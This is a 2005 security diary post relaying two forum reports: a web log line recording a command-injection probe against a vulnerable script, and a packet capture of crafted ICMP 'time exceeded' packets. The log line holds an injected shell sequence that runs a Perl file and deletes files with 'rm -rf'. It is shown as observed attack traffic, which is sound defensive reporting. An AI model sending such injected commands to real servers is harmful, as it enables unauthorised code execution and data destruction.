Notes from the DShield Forum

Published: 2005-09-16
Last Updated: 2005-09-18 12:58:56 UTC
by Lenny Zeltser (Version: 1)
0 comment(s)
There were a few posts to the DShield discussion forum today that are worth watching for, even though at the moment they are single observations, and are not part of any trends at the moment.

Andy Green reported that his server received a scan for the vulnerable script, even though the script was not actually present on his server:

[04:06:01 +0100] GET //
  perl%20a.txt;echo%20;rm%20-rf%20a.txt*;echo| HTTP/1.1 404 287 -

In an unrelated post, Jakob Staerk reported receiving crafted ICMP "time exceeded in transit" packets hitting his server:
16:18:29.282413 IP (tos 0x0, ttl 243, id 5715, offset 0, 
flags [none], length: 56) > xx.xx.xx.xx:
icmp 36: time exceeded in-transit for IP
(tos 0x0, ttl 1, id 6520, offset 0, flags [DF], length: 48)
xx.xx.xx.xx.11582 > [|tcp]
0x0000: 4500 0038 1653 0000 f301 474b db9e 08dd E..8.S....GK....
0x0010: xxxx xxxx 0b00 b1c1 0000 0000 4500 0030 xxxx........E..0
0x0020: 1978 4000 0106 1828 xxxx xxxx dea8 e3d4 .x@....(xxxx....
0x0030: 2d3e 0050 6a78 ab37 ->.Pjx.7
For additional information about these issues, please see the corresponding DShield posts. (Note that the long lines above were wrapped for readability.)
0 comment(s)


Diary Archives